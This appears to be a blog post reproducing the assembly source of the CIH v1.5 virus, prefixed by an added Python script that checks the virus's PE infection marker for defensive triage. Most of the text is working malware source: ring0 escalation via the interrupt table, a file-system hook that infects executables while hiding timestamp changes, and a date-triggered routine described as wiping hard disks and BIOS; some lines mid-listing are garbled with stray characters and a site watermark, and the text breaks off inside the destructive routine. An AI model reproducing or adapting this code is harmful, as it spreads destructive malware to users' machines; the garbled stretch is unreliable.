CIH v1.5 Virus Source

2006-09-10 01:01:16 / Weather: Sunny / Mood: Happy / Category: Assembly Programming
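Added example, not part of the original post or of the virus source: a defender-side Python check that repeats the comparison the listing below makes before it touches a file (read the dword at offset 3Ch, step back one byte, compare four bytes with 00455000h). It reports whether the byte in front of the 'PE' signature, which the source's comments call the infected mark, is clear or set. The function names, verdict strings and sample buffers are constructed for illustration.

```python
import struct
from dataclasses import dataclass
from typing import Dict, Optional

E_LFANEW_OFFSET = 0x3C      # listing: push 0000003ch / pop edx, then read 4 bytes
CHECK_DWORD = 0x00455000    # listing: cmp dword ptr [esi], 00455000h


@dataclass(frozen=True)
class MarkerResult:
    verdict: str                 # "not-pe", "marker-clear" or "marker-set"
    e_lfanew: Optional[int]      # offset of the PE signature, if one was read
    marker: Optional[int]        # byte stored immediately before the signature


def check_marker(data: bytes) -> MarkerResult:
    """Classify a file image by the byte in front of its PE signature."""
    # Added sanity check, not in the listing: require the DOS "MZ" magic.
    if len(data) < E_LFANEW_OFFSET + 4 or data[:2] != b"MZ":
        return MarkerResult("not-pe", None, None)
    (e_lfanew,) = struct.unpack_from("<I", data, E_LFANEW_OFFSET)
    # The listing steps back one byte (dec edx) and reads a dword from there.
    start = e_lfanew - 1
    if start < 0 or start + 4 > len(data):
        return MarkerResult("not-pe", e_lfanew, None)
    (dword,) = struct.unpack_from("<I", data, start)
    # Upper three bytes must be 'P', 'E', 0x00 for the file to count as PE.
    if dword >> 8 != CHECK_DWORD >> 8:
        return MarkerResult("not-pe", e_lfanew, None)
    marker = dword & 0xFF
    # marker == 0 is the only value that passes the listing's comparison.
    verdict = "marker-clear" if marker == 0 else "marker-set"
    return MarkerResult(verdict, e_lfanew, marker)


def build_sample(marker: int, e_lfanew: int = 0x80) -> bytes:
    """Constructed test buffer: MZ magic, e_lfanew, marker byte, 'PE\\0\\0'."""
    buf = bytearray(e_lfanew + 4)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, E_LFANEW_OFFSET, e_lfanew)
    buf[e_lfanew - 1] = marker
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    return bytes(buf)


def build_ne_sample() -> bytes:
    """Constructed buffer with an 'NE' signature where 'PE' would be."""
    buf = bytearray(build_sample(0x00))
    buf[0x80:0x82] = b"NE"
    return bytes(buf)


def triage(samples: Dict[str, bytes]) -> Dict[str, str]:
    """Map each sample name to its verdict."""
    return {name: check_marker(blob).verdict for name, blob in samples.items()}


# Constructed samples; 0x01 is an arbitrary non-zero value, not a real indicator.
SAMPLES = {
    "clear.exe": build_sample(0x00),
    "set.exe": build_sample(0x01),
    "ne.exe": build_ne_sample(),
    "truncated.exe": build_sample(0x00)[:0x40],
    "notes.txt": b"echo hello\n" * 10,
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name:14s} {verdict}")
```

A set marker byte is a triage signal rather than a verdict: a DOS stub that is not zero-padded up to the signature gives the same result in a clean binary.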

; ****************************************************************************
; *                        The Virus Program Information                     *
; ****************************************************************************
; *                                                                          *
; *   Designer : CIH                   Source  : TTIT of TATUNG in Taiwan    *
; *   Create Date : 04/26/1998         E-mail  : WinCIH.Tatung@usa.net       *
; *   Modification Time : 06/01/1998   Version : 1.5                         *
; *                                                                          *
; *   Turbo Assembler Version 5.0    : Tasm /m cih                           *
; *   Turbo link Version 5.01        : Tlink /3 /t cih, cih.exe              *
; *                                                                          *
; *==========================================================================*
; *                        Modification History                              *
; *==========================================================================*
; *     v1.0    1. Create the Virus Program.                                 *
; *             2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *             6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *             7. It is also Infected, even the File is Read-Only.          *
; *             8. When the File is Infected, the Modification Date and Time *
; *                of the File also don't be Changed.                        *
; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *                Previous FileSystemApiHook, it will Call the Function     *
; *                that the IFS Manager Would Normally Call to Implement     *
; *                this Particular I/O Request.                              *
; *            10. The Virus Size is only 656 Bytes.                         *
; *==========================================================================*
; *     v1.1    1. Especially, the File that be Infected will not Increase   *
; *                it's Size...   ^__^                                       *
; * 05/15/1998  2. Hook and Modify Structured Exception Handing.             *
; *                When Exception Error Occurs, Our OS System should be in   *
; *                Windows NT. So My Cute Virus will not Continue to Run,    *
; *                it will Jmup to Original Application to Run.              *
; *             3. Use Better Algorithm, Reduce Virus Code Size.             *
; *             4. The Virus "Basic" Size is only 796 Bytes.                 *
; *==========================================================================*
; *     v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *
; *             2. Modify the Bug of v1.1                                    *
; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     *
; *==========================================================================*
; *     v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *                So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.                     *
; *==========================================================================*
; *     v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *             2. Change the Date of Killing Computers.                     *
; * 05/31/1998  3. Modify Virus Version Copyright.                           *
; *             4. The Virus "Basic" Size is 1019 Bytes.                     *
; ****************************************************************************
; *     v1.5    1. Full Modify the Bug : Change Harddisk Killing Port        *
; *             2. Modify Virus Version Copyright.                           *
; * 06/01/1998  3. Clear Garbage in Source Code.                             *
; *             4. The Virus "Small" Size in 10xx Bytes.                     *
; ****************************************************************************

                .586

; ****************************************************************************
; *             Original PE Executable File(Don't Modify this Section)       *
; ****************************************************************************

OriginalAppEXE  SEGMENT

FileHeader:
                dd      00000000h, VirusSize

OriginalAppEXE  ENDS

; ****************************************************************************
; *                     My Virus Game                                        *
; ****************************************************************************

; *********************************************************
; *                    Constant Define                    *
; *********************************************************

TRUE = 1
FALSE = 0

DEBUG = TRUE

IF DEBUG

        FirstKillHardDiskNumber =       82h
        HookExceptionNumber     =       06h

ELSE

        FirstKillHardDiskNumber =       81h
        HookExceptionNumber     =       04h

ENDIF

FileNameBufferSize = 7fh

; *********************************************************
; *********************************************************

VirusGame               SEGMENT

                        ASSUME  CS:VirusGame, DS:VirusGame, SS:VirusGame
                        ASSUME  ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; *             Ring3 Virus Game Initial Program          *
; *********************************************************

MyVirusStart:
                        push    ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error  *
; * Occurrence, Especially in NT.     *
; *************************************

                        lea     eax, [esp-04h*2]
                        xor     ebx, ebx
                        xchg    eax, fs:[ebx]
                        call    @0
@0:
                        pop     ebx
                        lea     ecx, StopToRunVirusCode-@0[ebx]
                        push    ecx
                        push    eax

; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************

                        push    eax             ;
                        sidt    [esp-02h]       ; Get IDT Base Address
                        pop     ebx             ;
                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0
                        cli
                        mov     ebp, [ebx]      ; Get Exception Base
                        mov     bp, [ebx-04h]   ; Entry Point
                        lea     esi, MyExceptionHook-@1[ecx]
                        push    esi
                        mov     [ebx-04h], si   ;
                        shr     esi, 16         ; Modify Exception
                        mov     [ebx+02h], si   ; Entry Point Address
                        pop     esi

; *************************************
; * Generate Exception to Get Ring0   *
; *************************************

                        int     HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $

; *************************************
; * Merge All Virus Code Section      *
; *************************************

                        push    esi
                        mov     esi, eax

LoopOfMergeAllVirusCodeSection:

                        mov     ecx, [eax-04h]
                        rep     movsb
                        sub     eax, 08h
                        mov     esi, [eax]
                        or      esi, esi
                        jz      QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
                        jmp     LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

                        pop     esi

; *************************************
; * Generate Exception Again          *
; *************************************

                        int     HookExceptionNumber ; GenerateException Again

; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************

ReadyRestoreSE:
                        sti
                        xor     ebx, ebx
                        jmp     RestoreSE

; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************

StopToRunVirusCode:
@1 = StopToRunVirusCode

                        xor     ebx, ebx
                        mov     eax, fs:[ebx]
                        mov     esp, [eax]

RestoreSE:
                        pop     dword ptr fs:[ebx]
                        pop     eax

; *************************************
; * Return Original App to Execute    *
; *************************************

                        pop     ebp
                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
                        ret                     ; Return to Original App Entry Point

; *********************************************************
; *             Ring0 Virus Game Initial Program          *
; *********************************************************

MyExceptionHook:
@2 = MyExceptionHook
                        jz      InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************

                        mov     ecx, dr0
                        jecxz   AllocateSystemMemoryPage
                        add     dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program   *
; *************************************

ExitRing0Init:
                        mov     [ebx-04h], bp   ;
                        shr     ebp, 16         ; Restore Exception
                        mov     [ebx+02h], bp   ;
                        iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage:

                        mov     dr0, ebx        ; Set the Mark of My Virus Exist in System
                        push    00000000fh      ;
                        push    ecx             ;
                        push    0ffffffffh      ;
                        push    ecx             ;
                        push    ecx             ;
                        push    ecx             ;
                        push    000000001h      ;
                        push    000000002h      ;
                        int     20h             ; VMMCALL _PageAllocate
_PageAllocate = $ ;
                        dd      00010053h       ; Use EAX, ECX, EDX, and flags
                        add     esp, 08h*04h
                        xchg    edi, eax        ; EDI = SystemMemory Start Address
                        lea     eax, MyVirusStart-@2[esi]
                        iretd                   ; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook   *
; *************************************

InstallMyFileSystemApiHook:

                        lea     eax, FileSystemApiHook-@6[edi]

                        push    eax             ;
                        int     20h             ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook =       $
                        dd      00400067h       ; Use EAX, ECX, EDX, and flags
                        mov     dr0, eax        ; Save OldFileSystemApiHook Address
                        pop     eax             ; EAX = FileSystemApiHook Address
                        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
                        mov     ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
                        mov     edx, [ecx]
                        mov     OldInstallFileSystemApiHook-@3[eax], edx
                        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
                        lea     eax, InstallFileSystemApiHook-@3[eax]
                        mov     [ecx], eax
                        cli
                        jmp     ExitRing0Init

; *********************************************************
; *             Code Size of Merge Virus Code Section     *
; *********************************************************

CodeSizeOfMergeVirusCodeSection = offset $

; *********************************************************
; *             IFSMgr_InstallFileSystemApiHook           *
; *********************************************************

InstallFileSystemApiHook:
                        push    ebx
                        call    @4              ;
@4:                                             ;
                        pop     ebx             ; mov ebx, offset FileSystemApiHook
                        add     ebx, FileSystemApiHook-@4 ;
                        push    ebx
                        int     20h             ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
                        dd      00400068h       ; Use EAX, ECX, EDX, and flags
                        pop     eax
                        ; Call Original IFSMgr_InstallFileSystemApiHook
                        ; to link Client FileSystemApiHook
                        push    dword ptr [esp+8]
                        call    OldInstallFileSystemApiHook-@3[ebx]
                        pop     ecx
                        push    eax
                        ; Call Original IFSMgr_InstallFileSystemApiHook
                        ; to link My FileSystemApiHook
                        push    ebx
                        call    OldInstallFileSystemApiHook-@3[ebx]
                        pop     ecx
                        mov     dr0, eax        ; Adjust OldFileSystemApiHook Address
                        pop     eax
                        pop     ebx
                        ret

; *********************************************************
; *             Static Data                               *
; *********************************************************

OldInstallFileSystemApiHook dd ?

; *********************************************************
; *             IFSMgr_FileSystemHook                     *
; *********************************************************

; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************

FileSystemApiHook:
@3 = FileSystemApiHook

                        pushad
                        call    @5              ;
@5:                                             ;
                        pop     esi             ; mov esi, offset VirusGameDataStartAddress
                        add     esi, VirusGameDataStartAddress-@5

; *************************************
; * Is OnBusy !?                      *
; *************************************

                        test    byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
                        jnz     pIFSFunc        ; goto pIFSFunc

; *************************************
; * Is OpenFile !?                    *
; *************************************

                        ; if ( NotOpenFile )
                        ; goto prevhook
                        lea     ebx, [esp+20h+04h+04h]
                        cmp     dword ptr [ebx], 00000024h
                        jne     prevhook

; *************************************
; * Enable OnBusy                     *
; *************************************

                        inc     byte ptr (OnBusy-@6)[esi] ; Enable OnBusy

; *************************************
; * Get FilePath's DriveNumber,       *
; * then Set the DriveName to         *
; * FileNameBuffer.                   *
; *************************************
; * Ex. If DriveNumber is 03h,        *
; *     DriveName is 'C:'.            *
; *************************************

                        add     esi, FileNameBuffer-@6
                        push    esi
                        mov     al, [ebx+04h]
                        cmp     al, 0ffh
                        je      CallUniToBCSPath
                        add     al, 40h
                        mov     ah, ':'
                        mov     [esi], eax
                        inc     esi
                        inc     esi

; *************************************
; * UniToBCSPath                      *
; *************************************
; * This Service Converts             *
; * a Canonicalized Unicode Pathname  *
; * to a Normal Pathname in the       *
; * Specified BCS Character Set.      *
; *************************************

CallUniToBCSPath:
                        push    00000000h
                        push    FileNameBufferSize
                        mov     ebx, [ebx+10h]
                        mov     eax, [ebx+0ch]
                        add     eax, 04h
                        push    eax
                        push    esi
                        int     20h             ; VXDCall UniToBCSPath
UniToBCSPath = $
                        dd      00400041h
                        add     esp, 04h*04h

; *************************************
; * Is FileName '.EXE' !?             *
; *************************************

                        cmp     [esi+eax-04h], 'EXE.'
                        pop     esi
                        jne     DisableOnBusy

IF DEBUG

; *************************************
; * Only for Debug                    *
; *************************************

                        cmp     [esi+eax-06h], 'KCUF'
                        jne     DisableOnBusy

ENDIF

; *************************************
; * Is Open Existing File !?          *
; *************************************

                        ; if ( NotOpenExistingFile )
                        ; goto DisableOnBusy
                        cmp     word ptr [ebx+18h], 01h
                        jne     DisableOnBusy

; *************************************
; * Get Attributes of the File        *
; *************************************

                        mov     ax, 4300h
                        int     20h             ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
                        dd      00400032h
                        jc      DisableOnBusy
                        push    ecx

; *************************************
; * Get IFSMgr_Ring0_FileIO Address   *
; *************************************

                        mov     edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
                        mov     edi, [edi]

; *************************************
; * Is Read-Only File !?              *
; *************************************

                        test    cl, 01h
                        jz      OpenFile

; *************************************
; * Modify Read-Only File to Write    *
; *************************************

                        mov     ax, 4301h
                        xor     ecx, ecx
                        call    edi             ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Open File                         *
; *************************************

OpenFile:
                        xor     eax, eax
                        mov     ah, 0d5h
                        xor     ecx, ecx
                        xor     edx, edx
                        inc     edx
                        mov     ebx, edx
                        inc     ebx
                        call    edi             ; VXDCall IFSMgr_Ring0_FileIO
                        xchg    ebx, eax        ; mov ebx, FileHandle

; *************************************
; * Need to Restore                   *
; * Attributes of the File !?         *
; *************************************

                        pop     ecx
                        pushf
                        test    cl, 01h
                        jz      IsOpenFileOK

; *************************************
; * Restore Attributes of the File    *
; *************************************

                        mov     ax, 4301h
                        call    edi             ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Is Open File OK !?                *
; *************************************

IsOpenFileOK:
                        popf
                        jc      DisableOnBusy

; *************************************
; * Open File Already Succeed.   ^__^ *
; *************************************

                        push    esi             ; Push FileNameBuffer Address to Stack

                        pushf                   ; Now CF = 0, Push Flag to Stack

                        add     esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetTonewHeader   *
; ***************************

                        xor     eax, eax
                        mov     ah, 0d6h
                        ; For Doing Minimal VirusCode's Length,
                        ; I Save EAX to EBP.
                        mov     ebp, eax
                        push    00000004h
                        pop     ecx
                        push    0000003ch
                        pop     edx
                        call    edi             ; VXDCall IFSMgr_Ring0_FileIO
                        mov     edx, [esi]

; ***************************
; * Get 'PE\0' Signature    *
; * of ImageFileHeader, and *
; * Infected Mark.          *
; ***************************

                        dec     edx
                        mov     eax, ebp
                        call    edi             ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Is PE !?                *
; ***************************
; * Is the File             *
; * Already Infected !?     *
; ***************************
; * WinZip Self-Extractor   *
; * doesn't Have Infected   *
; * Mark Because My Virus   *
; * doesn't Infect it.      *
; ***************************

                        cmp     dword ptr [esi], 00455000h
,K d-A iJEE*}0jne CloseFile
^k"`~9B"{G9hH0
5GQ;Y`(S:Kh0; *************************************★黑基空间★9?@3F6J'l*Xv)~:P
; * The File is                   ^o^ *★黑基空间★7gl#zH6r `i)e
; * PE(Portable Executable) indeed.   *
d}C1_d0; *************************************
h)V4~H*E#s0; * The File isn't also Infected.     *
.c-d.?fK0; *************************************★黑基空间★-C;d%q e+} pA\|
★黑基空间★NVs)u+A jW+T)p
; *************************************
; * Start to Infect the File          *
; *************************************
; * Registers Use Status Now :        *
; *                                   *
; * EAX = 04h                         *
; * EBX = File Handle                 *
; * ECX = 04h                         *
; * EDX = 'PE\0\0' Signature of       *
; *       ImageFileHeader Pointer's   *
; *       Former Byte.                *
; * ESI = DataBuffer Address ==> @8   *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump :                      *
; *                                   *
; * ESP => -------------------------  *
; *        |       EFLAG(CF=0)     |  *
; *        -------------------------  *
; *        | FileNameBufferPointer |  *
; *        -------------------------  *
; *        |          EDI          |  *
; *        -------------------------  *
; *        |          ESI          |  *
; *        -------------------------  *
; *        |          EBP          |  *
; *        -------------------------  *
; *        |          ESP          |  *
; *        -------------------------  *
; *        |          EBX          |  *
; *        -------------------------  *
; *        |          EDX          |  *
; *        -------------------------  *
; *        |          ECX          |  *
; *        -------------------------  *
; *        |          EAX          |  *
; *        -------------------------  *
; *        |     Return Address    |  *
; *        -------------------------  *
; *************************************

push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark

; ***************************
; * Let's Set the           *
; * Virus' Infected Mark    *
; ***************************

push 01h ; Size
push edx ; Pointer of File
push edi ; Address of Buffer

; ***************************
; * Save ESP Register       *
; ***************************

mov dr1, esp

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * ( Only First Set Size ) *
; ***************************

push eax ; Size

; ***************************
; * Let's Read              *
; * Image Header in File    *
; ***************************

mov eax, ebp
mov cl, SizeOfImageHeaderToRead
add edx, 07h ; Move EDX to NumberOfSections
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * ( Set Pointer of File,  *
; *   Address of Buffer   ) *
; ***************************

lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer

; ***************************
; * Move EDX to the Start   *
; * of SectionTable in File *
; ***************************

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h]

; ***************************
; * Let's Get               *
; * Total Size of Sections  *
; ***************************

mov al, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl

; ***************************
; * Let's Set Section Table *
; ***************************

; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer

; ***************************
; * The Code Size of Merge  *
; * Virus Code Section and  *
; * Total Size of Virus     *
; * Code Section Table Must *
; * be Small or Equal the   *
; * Unused Space Size of    *
; * Following Section Table *
; ***************************

inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable

add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
jl OnlySetInfectedMark

; ***************************
; * Read All Section Tables *
; ***************************

mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Full Modify the Bug :   *
; * WinZip Self-Extractor   *
; * Occurs Error...         *
; ***************************
; * So When User Opens      *
; * WinZip Self-Extractor,  *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the   *
; * PointerToRawData in the *
; * Second Section Table,   *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'......       *
; ***************************

xchg eax, ebp
push 00000004h
pop ecx
push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
add edx, 12h
call edi ; VXDCall IFSMgr_Ring0_FileIO
cmp dword ptr [esi], 'piZniW'
je NotSetInfectedMark
pop edx

; ***************************
; * Let's Set Total Virus   *
; * Code Section Table      *
; ***************************

; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp
push edx ; Pointer of File
add ebp, esi
push ebp ; Address of Buffer

; ***************************
; * Set the First Virus     *
; * Code Section Size in    *
; * VirusCodeSectionTable   *
; ***************************

lea eax, [ebp+edi-04h]
mov [eax], ebx

; ***************************
; * Let's Set My Virus      *
; * First Section Code      *
; ***************************

push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer

; ***************************
; * Let's Modify the        *
; * AddressOfEntryPoint to  *
; * My Virus Entry Point    *
; ***************************

mov (NewAddressOfEntryPoint-@9)[esi], edx

; ***************************
; * Setup Initial Data      *
; ***************************

lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections

; ***************************
; * Write Code to Sections  *
; ***************************

LoopOfWriteCodeToSections:

add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx

; Section contains initialized data ==> 00000040h
; Section can be Read.              ==> 40000000h
or (Characteristics-@9)[edx], 40000040h

StartToWriteCodeToSections:

sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer

EndOfWriteCodeToSections:

loop LoopOfWriteCodeToSections

; ***************************
; * Only Set Infected Mark  *
; ***************************

OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile

; ***************************
; * Not Set Infected Mark   *
; ***************************

NotSetInfectedMark:
add esp, 3ch
jmp CloseFile

; ***************************
; * Set Virus Code          *
; * Section Table End Mark  *
; ***************************

SetVirusCodeSectionTableEndMark:

; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp

; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx

; ***************************
; * When VirusGame Calls    *
; * VxDCall, VMM Modifies   *
; * the 'int 20h' and the   *
; * 'Service Identifier'    *
; * to 'Call [XXXXXXXX]'.   *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First.     ^__^    *
; ***************************

lea eax, (LastVxDCallAddress-2-@9)[esi]
mov cl, VxDCallTableSize

LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID

; ***************************
; * Let's Write             *
; * Virus Code to the File  *
; ***************************

WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]

LoopOfWriteVirusCodeToFile:

pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile

; ***************************
; * Let's Set CF = 1 ==>    *
; * Need to Restore File    *
; * Modification Time       *
; ***************************

SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf

; *************************************
; * Close File                        *
; *************************************

CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !?                           *
; *************************************

popf
pop esi
jnc IsKillComputer

; *************************************
; * Restore File Modification Time    *
; *************************************

mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime+2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Disable OnBusy                    *
; *************************************

DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy

; *************************************
; * Call Previous FileSystemApiHook   *
; *************************************

prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook

; *************************************
; * Call the Function that the IFS    *
; * Manager Would Normally Call to    *
; * Implement this Particular I/O     *
; * Request.                          *
; *************************************

pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;
mov [ebx+1ch], eax ; Modify EAX Value in Stack

; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the  *
; * Returned pioreq.        *
; ***************************

cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook

; *****************
; * Get the File  *
; * Modification  *
; * Date and Time *
; * in DOS Format.*
; *****************

mov eax, [ecx+28h]
mov (FileModificationTime-@6)[esi], eax

; ***************************
; * Quit My Virus'          *
; * IFSMgr_FileSystemHook   *
; ***************************

QuitMyVirusFileSystemHook:

popad
ret

; *************************************
; * Kill Computer !? ...   *^_^*      *
; *************************************

IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h
out 70h, al
in al, 71h
xor al, 01h ; ??/26/????

IF DEBUG
jmp DisableOnBusy
ELSE
jnz DisableOnBusy
ENDIF

; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *